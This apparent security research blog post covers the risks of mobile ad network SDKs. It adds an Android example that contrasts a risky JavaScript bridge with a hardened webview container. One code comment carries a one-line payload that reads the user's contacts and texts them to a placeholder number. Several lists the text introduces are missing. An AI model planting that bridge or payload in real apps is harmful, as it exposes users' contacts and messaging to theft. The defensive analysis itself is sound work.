The overwhelming majority of mobile device users resist paying for applications. Therefore developers are particularly interested in experimenting with monetisation through serving advertisements.
It’s not a bad idea either: mobile advertising revenue (for the US) was $31 billion in 2011 and $36 billion in 2012 (source: Interactive Advertising Bureau). Often developers can make far more money using adverts to monetise their applications than by charging a small fee for the software they have developed.
A study by Cambridge University found that:
The future of app monetisation clearly lies in the ad-supported model. So where’s the catch? Isn’t this win/win? Are we really getting something for nothing? Based on the research conducted by MWR, you’re actually paying for these ‘free’ applications.
You may be handing over your address book, giving away the contents of your SMSs, allowing someone to read your e-mails, or in some cases giving away full control of your device. In the very worst cases, all of these things and more! We’ve seen ad networks that:
All of these behaviours are either implemented ‘features’ that are being used and abused, or can be achieved by exploiting resident vulnerabilities in the ad network’s Software Development Kit (SDK).
These vulnerabilities and ‘features’ are often available on all of the major platforms, iOS, Android, Windows Phone and Blackberry. However, they are not all exploitable to the same degree due to platform idiosyncrasies, security architectures (such as sandboxing) and platform specific exploitation mitigations.
The way that mobile advertising networks are ‘supposed’ to work is as follows. An advertiser pays a fee for their advert to be shown (in reality it’s actually a very complex pricing model based on a plethora of options, but we’ll try and keep things simple). The advertising network makes available a Software Development Kit (SDK). The SDK is ‘plugged’ into a mobile application by a developer looking to monetise their application. Then when someone downloads and uses the application, the code in the ad network SDK is triggered. The user of the application will see an advert of some kind, and, if the user interacts with the advert in some way, such as watching a video, clicking on a link to view and possibly install another application, or purchase an advertised product, etc., then these interactions are recorded and transmitted to the ad network so that the developer of the application can receive the appropriate payment and the advertiser pays the agreed fee.
So basically, a developer ‘plugs’ in the SDK to their application, gives the application away for free and earns money for every advert shown. What could go wrong? The economics and the associated ecosystem of the advertising world, let alone the mobile advertising world, is a complex beast far beyond the scope of this blog post; so we’ll attempt to simplify it somewhat.
Advertising networks want to maximise their profits, therefore they are always looking for the most advantageous way to achieve this. Advertising networks gather metrics so that they can tailor campaigns and target specific audiences. Advertisers pay a lot of money for accurate metrics and/or successful delivery of targeted advertisements. Your data and meta-data (data about you and your data) are very valuable. They can be sold to 3rd parties and used to deliver more targeted adverts that will increase the likelihood of your interacting with them. Advertising networks are always looking for ingenious ways to profit from the data they collect. In addition to this, advertisers want to deliver the most captivating and ‘feature’ rich adverts. To this end, they look to leverage the mobile devices’ ‘native’ capabilities to do so.
This in itself is not groundbreaking news. The phenomenon of advertising networks stealing your data and leaking sensitive information has been widely reported for some time. Below are just a few links to media articles that have documented this:
So we all know that ad networks are collecting our data, transmitting it insecurely, tracking our movements, profiling us, listening to us and selling on our data to unknown third parties.
It’s worth stating this again: “If You’re Not Paying, You’re The Product”. Those who are already aware of the actions of the advertising networks and have read the articles listed above or similar will probably also be aware (that in some cases at least), the advertising networks have been forced to protect this data from eavesdroppers and to ensure that it is made anonymous to an adequate degree. Those who have been named and shamed have done this adequately. A lot have not.
There are hundreds of ad networks out there, as well as a diverse and expansive ecosystem; it’s impossible to keep tabs on all of them. Application developers choose the ad network to embed in their application based on how much they can potentially earn. Every search for ad networks will present you with several articles comparing which ad networks provide the highest returns, not which ones leak the least data or perform the least suspicious activity.
MWR’s research expands on the exploration already conducted by journalists and reputable security companies. We were interested in looking deeper into how these advertising networks work and figuring out exactly what is going on under the hood, in an attempt to quantify the risk that ad networks pose to the security of mobile devices and/or the data stored and processed on them. Our research led to some very interesting and hard to digest findings.
During our research we have found that ad networks do a lot more than they advertise, and in fact often display very aggressive behaviours. In addition we have found many ad networks to be vulnerable to classes of threat that could allow attackers and/or malicious 3rd parties to abuse exposed functionality to perform nefarious actions. We have found a number of vulnerabilities in various networks that malicious attackers could exploit to do a number of things you really wouldn’t want. It should be noted that the advertising network(s) are also in a position to exploit the same weaknesses, as indeed could an advertiser who developed an advert and paid the advertising network to display it on their behalf.
In summary, there are a number of parties who can potentially do things they really shouldn’t be able to do to your mobile device and the data it contains via embedded mobile ad networks.
We will be releasing more technical details on each issue with examples of why these vulnerabilities exist, how they can be exploited and importantly, how to identify them for yourself, along with information on the work flow followed by the researchers investigating these libraries. However, within this post we intend to keep things high level.
Most of the exploitable issues identified are present because of how the ad networks and the advertisements interact with the mobile device, in particular how they access the device’s ‘native’ features. The ad network SDKs require the application developer to display ad content within a WebKit webview. WebKit is the open source web browser engine behind Apple Safari and the stock iOS and Android browsers (and, until Google forked it as Blink in 2013, Google Chrome). An app uses a webview to load HTML content, just as your desktop browser loads a web site, and the ad network SDK uses that embedded browser instance to fetch and display an advert. Because the webview runs inside the app’s own process, any bridge the SDK builds between the advert’s HTML/JavaScript and the app’s code is a path from remotely served content straight to native device functionality.
The ad network SDK is written in the platform’s application language (Java on Android, Objective-C on iOS, C# on Windows Phone, and so on) and is compiled into the host application, so it runs with everything the application can do. The SDKs are closed source. This means that the developer embedding the code into their application doesn’t actually know what it does and can’t look at the source code to find out either. So they are blindly trusting that the code is not doing anything it shouldn’t. In turn, when you install the application from the developer, via the Apple App Store, Google Play Store or Windows Market Place, you are not only trusting that the developer of the application and the code you are installing are trustworthy, but you are also implicitly trusting that the code developed by the ad network is trustworthy too.
Additionally, when you install an application, in order to do things such as read/send SMSs, take pictures with the camera, access contacts, etc., it needs to ask for permission to do so. When you install an application that can be used to send a picture taken with your camera to a social network of choice or offer to e-mail it to a friend, it seems a legitimate request to ask for the relevant permissions. However, the ad network SDK runs inside the same process and sandbox as the application, so when you grant these permissions the ad network inherits every one of them; the platform has no way to give the SDK less than the app. Did you really want to give an anonymous 3rd party advertiser access to your photos, or the ability to upload them to your social network? What about the ability to read and send SMSs?
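The webview-to-native path and the permission inheritance described above, as an added example that is not code from the original post or from any ad network’s SDK. It is Android Java using only standard android.webkit, android.telephony and android.provider APIs; the AdContainer and DeviceBridge names and the ads.example.invalid endpoints are hypothetical. The post does not say which specific SDK issues MWR found, so this shows the general shape of the problem (a bridge object handed to ad HTML fetched over cleartext HTTP) next to a hardened container that exposes nothing.

```java
import android.annotation.SuppressLint;
import android.content.Context;
import android.database.Cursor;
import android.provider.ContactsContract;
import android.telephony.SmsManager;
import android.webkit.JavascriptInterface;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

/**
 * Illustrative ad container (hypothetical; not any real ad network's SDK).
 * Both show*() methods run inside the host app's process, so every permission
 * the host app was granted (READ_CONTACTS, SEND_SMS, ...) is available here.
 */
public final class AdContainer {

    // Hypothetical ad endpoints; ".invalid" is reserved and never resolves.
    static final String AD_URL_CLEARTEXT = "http://ads.example.invalid/serve?app=demo";
    static final String AD_URL_TLS       = "https://ads.example.invalid/serve?app=demo";

    /** Java object the risky container hands to the advert's JavaScript. */
    static final class DeviceBridge {
        private final Context ctx;
        DeviceBridge(Context ctx) { this.ctx = ctx; }

        // Callable from ad JavaScript as window.device.sendSms(to, body).
        // Uses the host app's SEND_SMS permission, not the ad network's.
        @JavascriptInterface
        public void sendSms(String to, String body) {
            SmsManager.getDefault().sendTextMessage(to, null, body, null, null);
        }

        // Callable as window.device.contactNames(); uses READ_CONTACTS.
        @JavascriptInterface
        public String contactNames() {
            StringBuilder out = new StringBuilder();
            Cursor c = ctx.getContentResolver().query(
                    ContactsContract.Contacts.CONTENT_URI,
                    new String[] { ContactsContract.Contacts.DISPLAY_NAME },
                    null, null, null);
            if (c == null) return "";
            try {
                while (c.moveToNext()) out.append(c.getString(0)).append('\n');
            } finally {
                c.close();
            }
            return out.toString();
        }
    }

    /**
     * Risky pattern: ad HTML fetched over cleartext HTTP, with a bridge into
     * the app. Anyone who can serve or tamper with the advert (the network,
     * an advertiser, or someone on the network path) can call the bridge:
     *   <script>window.device.sendSms("+15550100", window.device.contactNames())</script>
     * On Android below API 17 every public method of the bridged object,
     * including getClass(), is reachable, so the page also gets reflection.
     */
    @SuppressLint({"SetJavaScriptEnabled", "AddJavascriptInterface"})
    public static void showAdRisky(WebView wv, Context ctx) {
        WebSettings s = wv.getSettings();
        s.setJavaScriptEnabled(true);
        wv.addJavascriptInterface(new DeviceBridge(ctx), "device");
        wv.loadUrl(AD_URL_CLEARTEXT);
    }

    /**
     * Hardened pattern: no bridge object at all, TLS only, no navigation to
     * non-TLS origins, no access to local files or content providers. Anything
     * the advert needs from the device must go through an explicit, reviewed
     * channel in the app rather than a generic Java object.
     */
    @SuppressLint("SetJavaScriptEnabled")
    public static void showAdHardened(WebView wv) {
        WebSettings s = wv.getSettings();
        s.setJavaScriptEnabled(true);      // adverts need JS; nothing else is granted
        s.setAllowFileAccess(false);       // no file:// reads from ad content
        s.setAllowContentAccess(false);    // no content:// provider reads (API 11+)
        wv.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                // Returning true cancels the navigation: only https:// is allowed.
                return !url.startsWith("https://");
            }
        });
        wv.loadUrl(AD_URL_TLS);
    }

    private AdContainer() {}
}
```

Two caveats on the hardened version: shouldOverrideUrlLoading only sees top-level navigations, not the advert’s own subresource requests, so cleartext must also be refused at the network layer (on newer Android via android:usesCleartextTraffic or a network security config); and from API 17 the @JavascriptInterface annotation limits which methods of a bridged object are exposed, but only when the app targets API 17 or later, which is why the hardened container avoids addJavascriptInterface altogether.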
This isn’t to say that all the ad networks are doing this, or embedding the code that is capable of doing this. Some ad networks just contain vulnerabilities that can be exploited in such a way that this can be done. Of course there are ad networks that do include functionality that it is difficult to find any justification for, but we don’t want to cast aspersions on ALL ad networks.
We presented some of the technical details along with demonstrations of how these vulnerabilities can be exploited at the 44CON conference in London. We will also be presenting some of the findings of this research at ZACon in South Africa in November. We also intend to release technical details of the vulnerabilities as and when it is possible. Until then: